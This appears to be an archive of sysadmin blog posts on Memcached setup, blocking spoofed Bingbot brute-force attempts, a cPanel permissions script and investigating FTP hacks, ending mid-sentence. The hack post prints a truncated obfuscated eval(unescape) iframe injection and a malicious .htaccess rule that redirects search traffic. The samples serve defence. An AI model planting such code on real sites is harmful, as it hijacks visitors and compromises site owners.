[boomshadow.net~]#

How to install Memcached

boomshadow — Wed, 08 Feb 2012 19:42:38 +0000

This guide will help you setup Memcached on a CentOS server.

What is caching

Before diving into Memcache specifically, let’s take a step back. What is caching? Why should you care and why should you use it? Caching is used for two very important reasons: to speed up the delivery of the pages and to alleviate system resources. Caching is used to speed up dynamic sites; database driven sites will benefit most form caching. Think about a WordPress site. Each page you visit is not an actually file, but rather an amalgamation of the theme, widgets, posts, footers, headers, etc… Each time a page is accessed, PHP will generate the page requested on the fly from the database. It takes time to query the database to create the page. These database queries put a strain on the resources of your server.

However, what if instead of continually generating a new page, the same page, for every visitor, you were to turn those pages into static HTML files? No database querying is needed for the new visitors. A static file can be served up much faster and with significantly less resource consumption. Your visitors see their requested page sooner, and you save on CPU cycles. Everyone is happy. This is what caching does.

What is Memcached

Memcached is a general-purpose distributed memory caching system. It is one of the most popular caching tools and is used in such popular sites as: YouTube, Reddit, Zynga, Facebook, and Twitter.

According to Memcached’s official site, Memcached is defined as: Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.

Installing Memcached (daemon)

The quickest and easiest method would be to install via Yum. First, you must grab the RPM that matches your OS:

CentOS 6 (64 bit):

su -c 'rpm -Uvh http://mirror.symnds.com/distributions/fedora-epel//6/x86_64/epel-release-6-5.noarch.rpm'

CentOS 6 (32 bit):

su -c 'rpm -Uvh http://mirror.symnds.com/distributions/fedora-epel//6/i386/epel-release-6-5.noarch.rpm'

CentOS 5 (64 bit):

su -c 'rpm -Uvh http://download.fedoraproject.org/pub/epel/5/x86_64/epel-release-5-4.noarch.rpm'

CentOS 5 (32 bit):

su -c 'rpm -Uvh http://download.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm'

CentOS 4 (32 bit):

su -c 'rpm -Uvh http://mirror.symnds.com/distributions/fedora-epel//4/i386/epel-release-4-10.noarch.rpm'

Now, to install it with Yum:

yum install memcached

Start the memcached service:

/etc/init.d/memcached start

Configure the memcached service to start when the server boots:

chkconfig memcached on

Finally, disable the RPM so that it is not used for future Yum functions:

perl -pi -e "s/enabled=1/enabled=0/g;" /etc/yum.repos.d/epel.repo

Note about this article

This article is one I had written for the ServInt blog as part of the ‘Tech bench’ series. You can view it on the ServInt blog here. Used with permission.

Spoofed Bingbot attacks against WP

boomshadow — Thu, 02 Feb 2012 17:19:04 +0000

#Updates
#02/04/12 – Revised wording to reinforce Bing’s perspective
#02/02/12 – Modified block code to identify bingbot as ‘badbingbot’ in case ‘bingbot’ is already being used somewhere

In the last 24 hours, I have seen a large scale attack on the admin logins for thousands of WordPress sites. The attackers are using the User Agent ‘Bingbot’. Bingbot certainly is NOT the culprit in these attacks, but is, unfortunately, being spoofed. These spoofing bots are attacking the wp-admin page. So far, I have only seen this affect WP Mage and Mage Monster users.

A brute force attack on any login is certainly undesirable; you obviously don’t want any unauthorized person accessing your admin area. However, the real problem comes from the CPU strain this is putting on the hosting server. These constant requests to hundreds of websites on the server will drive up the CPU load, effectively tying up the resources. The server will not be able to serve up pages to legitimate traffic or legitimate search engine bots that are trying to crawl the sites.

There is a solution you can use to combat this problem. The solution is to block the Bingbot user agent from accessing your these admin pages. An IP based firewall block would do no good as the source IP’s have no common denominator; the IP’s are too spread out and come from many different geographical locations.

By implementing the following fix, you can reduce the loads back to normal operating levels allowing your site’s pages to load once again and you will not affect your rank with Bing. After a couple of days, the attack should have subsided and you should be able to safely reverse the changes. However, per Duane Forrester of Bing’s webmaster tools, you do not have to undo the block. There is no harm in permanently preventing your admin pages from being indexed (for reference, see his comment here).

Are you affected?

You can run a quick check to see if your sites are being hit with this spoofed Bingbot attack. Check your sites’ domlogs and look for any Bingbot User Agent requests that are hitting WordPress admin pages:

grep bingbot /usr/local/apache/domlogs/* | grep wp-login

If you receive numerous results from running that, especially from various IP addresses, it means that you are being affected. If you see many ‘POST’ commands in there, it means they are also trying to log into WordPress.

Example:

/usr/local/apache/domlogs/domain.com:24.153.219.159 - - [01/Feb/2012:15:27:18 -0500] "GET /wp-login.php?redirect_to=http%3A%2F%2FDOMAIN.COM%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 2206 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
/usr/local/apache/domlogs/domain.com:24.153.219.159 - - [01/Feb/2012:15:27:18 -0500] "POST /wp-login.php HTTP/1.1" 200 3084 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

How to block them

Now that you’ve verified that this directly affects you, time to block them and restore your server’s vitality.

#1 – Edit the pre-virtual host conf

We need to tell the server what is a “bad bot”. In this case, it is Bingbot. Then, we tell it to block it:

nano /usr/local/apache/conf/includes/pre_virtualhost_global.conf

At the bottom of the file add:

SetEnvIfNoCase User-Agent ".*bingbot" badbingbot


	order allow,deny
	allow from all
	Deny from env=badbingbot

If you do not want to block Bingbot on every domain and would rather only block it on a few particular affected domains, you can, instead, make the change to each domains’ virtual host via an include file. For more information, see cPanel’s documentation here: http://docs.cpanel.net/twiki/bin/view/EasyApache3/InsideVHost

#2 – Restart Apache

Now it is time to restart Apache so that our changes can take effect:

service httpd restart

Test it

Which Apache restarted, you should see your CPU load start dropping immediately. You will want to test it to make sure that bingbot is successfully blocked. Do what the attackers are doing, access your page while spoofing your User agent as Bingbot:

wget -U "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" http://domain.com/wp-login.php

Be sure to change ‘domain.com’ with your actual domain name. You should receive a 403 Forbidden error. If not, the file that is downloaded should be completely empty, meaning no content was served up.

SOPA/PIPA – Join the Fight

boomshadow — Fri, 20 Jan 2012 19:32:19 +0000

There are two very important pieces of legislature that is being considered by Congress: SOPA & PIPA. These bills are terrible in that they will irrevocably harm Internet freedom. I would go into more detail here, but I think a visual aid is a far better tool. This is a video I directed to help combat these bills. Made for StopTheWall.us via Engine Advocacy and Christian Dawson

Animation: Brian & Chris Pennington w/ DUO Media Productions
Writers: Christian Dawson, Thomas Wilson, and myself
Sound: DUO Media & Sean Richwine
Directed by: Me (Boom Shadow)

Pirate ship icon now available as a fun sticker!
.
.
.

Auto fix for file permissions and ownership

boomshadow — Sat, 22 Oct 2011 08:03:16 +0000

#Updates:
#01/26/2012 | New feature rich script written by Colin R.

suPHP and FastCGI require files and folders to have a specific set of permissions/ownership from other handlers. Without these permissions set you will see a lot of errors such as: “403 Forbidden”, “500 Internal Server Error”, or simply generic errors that commonly have the word ‘permission’ in them.

It can be very time consuming to track down and check file permissions across a whole server. Luckily, fixing this on a cPanel box can be scripted. This gives us a quick and very easy script you can wget to any cPanel server. Simply run the ‘fixperms’ script, specifying the user (or all users), sit back and watch the errors just disappear. I use this script daily in my administrative work and it never fails! It is simply a good generic fix if you cannot find your permission problem, or if you have just switched your handler and need a quick way to change every user account on the server.

Credit does not go to me though. A good buddy of mine, Colin R., wrote this for ServInt. Thanks Colin for making lives easier!

***WARNING!!! The following scripts are intended for suPHP or FastCGI ONLY! If you are not running either of these 2 handlers, do not run fixperms. The script will cause problems if you are running another handler such as DSO.

Furthermore, it is highly recommended that you run a full backup of your server before running fixperms or any other script that makes changes to multiple files.

This ‘fixperms’ script is intended for cPanel servers only. It is dependent on cPanel’s internal scripts and file structure. If you’re on anything else (such as Plesk), it will simply fail to run. It won’t be able to do anything.

I know that criteria sounds very specific, but those two conditions cover a large number of the reseller/multi-user hosting servers out there. And that’s really the crowd that would benefit most from an automated script such as this.

#1 – WGET Fixperms – for one single user

To use the fixperms script, simply log into your server as root, wget the file from our server, then run it. Type in the cPanel username and it will run only for that particular account.

It does not matter which directory you are in when you run fixperms. You can be in the user’s home directory, the server root, etc. The script will not affect anything outside of the particular user’s folder.

wget boomshadow.net/wp-content/uploads/2011/10/fixperms.sh
sh ./fixperms.sh -a USER-NAME

#2 – Fixperms – for all of the users

If you would like fix the permissions for every user on your cPanel server, simply use the ‘–all’ option:

./fixperms.sh --all

#3 – Verbosity of Fixperms

By default, the script runs in a ‘quiet’ mode with minimal display. However, if you are like me, you may want to see everything that is happening. You can turn on verbosity and have the script print to the screen everything that is being changed. I find this extremely useful when fixing large accounts that have many files. You can watch the changes as a sort of ‘progress bar’ of completion. The ‘-v’ option can be used per account or with all accounts.

For one single account:

./fixperms.sh -v -a USER-NAME

For all accounts:

./fixperms.sh -v --all

#3 – The code itself, what’s in it?

I understand that it can be a big security concern to simply ‘wget’ a file from a website you found, and then blindly run it on a production server. I understand your fear; I’m right there with you and would likewise be leery and very hesitant. However, I promise you that there is no malicious intent in this or anything you will ever get from my site. I have pasted the content of the file below for your examination.

#! /bin/bash
#
# Date: Jan 26th 2012
# Author: Colin Roche-Dutch
# Fixperms script for ServInt
#
#   Fixperms script for cPanel servers running suPHP or FastCGI
#   Written for ServInt.net
#   Copyright 2012 ServInt Corporation
#
#   This program is free software: you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation, either version 3 of the License, or
#   (at your option) any later version.
#
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details. http://www.gnu.org/licenses/

# Set verbose to null
verbose=""

#Print the help text
helptext () {
    tput bold
    tput setaf 2
    echo "Fix perms script help:"
    echo "Sets file/directory permissions to match suPHP and FastCGI schemes"
    echo "USAGE: fixperms [options] -a account_name"
    echo "-------"
    echo "Options:"
    echo "-h or --help: print this screen and exit"
    echo "-v: verbose output"
    echo "--all: run on all cPanel accounts"
    echo "--account or -a: specify a cPanel account"
    tput sgr0
    exit 0
}

# Main workhorse, fix perms per account passed to it
fixperms () {

  #Get account from what is passed to the function
  account=$1

  #Check account against cPanel users file
  if ! grep $account /var/cpanel/users/*
  then
    tput bold
    tput setaf 1
    echo "Invalid cPanel account"
    tput sgr0
    exit 0
  fi

  #Make sure account isn't blank
  if [ -z $account ]
  then
    tput bold
    tput setaf 1
    echo "Need an account name!"
    tput sgr0
    helptext
  #Else, start doing work
  else
    tput bold
    tput setaf 4
    echo "Fixing perms for $account:"
    tput setaf 3
    echo "------------------------"
    tput setaf 4
    echo "Fixing website files...."
    tput sgr0
    #Fix individual files in public_html
    find /home/$account/public_html -type d -exec chmod $verbose 755 {} \;
    find /home/$account/public_html -type f | xargs -r chmod $verbose 644
    find /home/$account/public_html -name '*.cgi' -o -name '*.pl' | xargs -r chmod $verbose 755
    chown $verbose -R $account:$account /home/$account/public_html/*

    tput bold
    tput setaf 4
    echo "Fixing public_html...."
    tput sgr0
    #Fix perms of public_html itself
    chown $verbose $account:nobody /home/$account/public_html
    chmod $verbose 750 /home/$account/public_html

    tput bold
    tput setaf 4
    echo "Fixing mail perms...."
    tput sgr0
    #Pass to cPanel's scripts to fix mail permissions
    if [ -z $verbose ]
    then
       /scripts/mailperm --skiplocaldomains --skipmxcheck --skipserverperm $account > /dev/null
    else
       /scripts/mailperm --verbose --skiplocaldomains --skipmxcheck --skipserverperm $account
    fi
    tput bold
    tput setaf 3
    printf "Finished!\n\n"
    tput sgr0
  fi

  return 0
}

#Parses all users through cPanel's users file
all () {
    cd /var/cpanel/users
    for user in *
    do
	fixperms $user
    done
}

#Main function, switches options passed to it
case "$1" in

    -h) helptext
	;;
    --help) helptext
	    ;;
    -v) verbose="-v"

	case "$2" in
		--all) all
		       ;;
		--account) fixperms "$3"
			   ;;
		-a) fixperms "$3"
		    ;;
		*) tput bold
     		   tput setaf 1
		   echo "Invalid Option!"
		   helptext
		   ;;
	esac
	;;
    --all) all
	  ;;
    --account) fixperms "$2"
      	 	;;
    -a) fixperms "$2"
	;;
    *)
       tput bold
       tput setaf 1
       echo "Invalid Option!"
       helptext
       ;;
esac

So there you have it. An effective permissions fix for your cPanel account. When you run this, people will think you’re a hero! So, go forth and save your users from the evils of site errors!

Note about this article

This article is one I had written for the ServInt blog as part of the ‘Tech bench’ series. You can view it on the ServInt blog here. Used with permission.

The beauty of sequenced sound

boomshadow — Sun, 17 Apr 2011 06:19:30 +0000

While perusing my friend Rob’s tumbl, I saw this wonderful sound matrix program called “ToneMatrix”. Since then, I have seen this reposted many times on tumblr and Facebook. If for nothing more than archival sake (in case the original URL ever goes down), I’m posting/hosting it here.

Its pretty easy: Simply click on some squares to get the music started. You can hold down the mouse and drag across the screen. Click on a square again to turn it off. Press the ‘space bar’ to clear. You can copy/paste your current pattern by right clicking.

The link to the original page is here:
http://lab.andre-michelle.com/tonematrix

Original text from the site:

Simple sinewave synthesizer triggered by an ordinary 16step sequencer. Each triggered step causes a force on the underlaying wave-map, which makes it more cute.

Based on the AudioTool engine thus no sources, I am sorry.

Press SPACE key to clear. Right-Click for Copy&Paste.

More info on my blog.

“The Bet” by Jay Gates

boomshadow — Wed, 16 Mar 2011 10:55:11 +0000

“The Bet” is the type of humorous film that one could imagine themselves sitting around doing the same thing with their friends. The wit is so wonderfully right up there with “Know how I know you’re gay?” jokes, but with more class.

You can always count on comedian Jay Gates for a great laugh. Jay is an Actor/Comedian/Director/whatever-needs-to-be done kind of guy, hailing from grand ol’ Virginia Beach. Be sure to check out his site: http://www.goldiebrown.com/.

And now, for the funny:

Two office co-workers continue their daily ritual of trying to win “The Bet.”
Starring: Danny Forte, Jay Gates, Rachael Lang & Paige Victorino
Written by: Danny Forte & Jay Gates
Directed & Edited by: Jay Gates

How to investigate an FTP hack

boomshadow — Sat, 26 Feb 2011 08:22:46 +0000

If you have a website, there is a good change that one day you will get hacked. It happens. With so many possible ways to intercept connections & gain entry, you cannot safe guard them all, not permanently anyway. A determined intruder can get in. I myself have even had one of my cPanel accounts compromised. There are a number of methods for severely lowering the chances of an intrusion, but I will be saving that for it’s own article as it will be rather involved. For this article, I am going to show you how you can investigate a hack after it happens; specifically when it happens via FTP.

The most common way that a hacker gains access is with FTP. In order to do so, they must use your password. They can either simply guess it, have a bot guess it (see Dictionary attack and Brute force attack), or sniff it out from your computer. The last option involves installing software on your system that steals the password when you type it in.

In all the above cases, they gain your password and log in as you. The server thinks that you are the one connecting and has no way of telling that it is actually an intrusion; this is because they have authorized themselves as you. There are some precautions you can set up on the server to prevent password guessing, such as an brute force detecting firewall (See Config Server Firewall). Again, I’ll go into detail in a future article. Let us begin with what to do afteryou are hacked.

#1 – Identifying the hack

The first step is learning that you are hacked. There are some pretty obvious ones that will jump out at you and then there are those that you may never notice till you edit the file (see example 1.3).

#1.1 – Bad lines of code

Typical hacks simply insert code into your pages. If you are lucky (relatively speaking), the code will actually be not execute properly and will make your pages produce errors such as this:

Parse error: syntax error, unexpected '<' in /home/user/public_html/wp-includes/default-widgets.php on line 1162

You may also see miscellaneous other lines of errors or 500 Internal Server errors.

eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%69%65%6E%68%75%2E%63%6F%6D%2F%3F%31%35%36%33%30%38%32%38%22%20%77%69%

#1.2 – Home page is replaced

The hacker my opt to simply replace your entire page with their own. Typically I’ve seen this of the recreational or political hacker. Here are some unfortunate examples that I have witnessed on others’ sites:

Example 1

Example 2

#1.3 – Traffic stolen through .htaccess

This one is probably the worst one of them all. This elegantly simple hack will steal your traffic by directing all visitors that come from a search engine to the hacker’s site. Meaning, if someone finds your site on Google, they will never actually get to your page. They’ll be taken elsewhere. This is achieved through the .htaccess:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC]

RewriteRule .* http://some-other-website.com/ [R=301,L]

I say this one is the worst because it can go undetected for a long time. It will not produce errors on your site, and most people do not browse through their own code very often. The biggest tell tale sign is if you notice a significant drop in traffic. As a precaution, make it a habit to search your own website on search engines to see what comes up. You should be doing this anyway to keep track of your SEO practices.

#2 – What files have been hacked?

For the sake of this article, I’m going to use a recent example I ran across with a client. They were the victim of #1.1, bad lines of code. Here is the code that was actually at the bottom of their wordpress’ index page: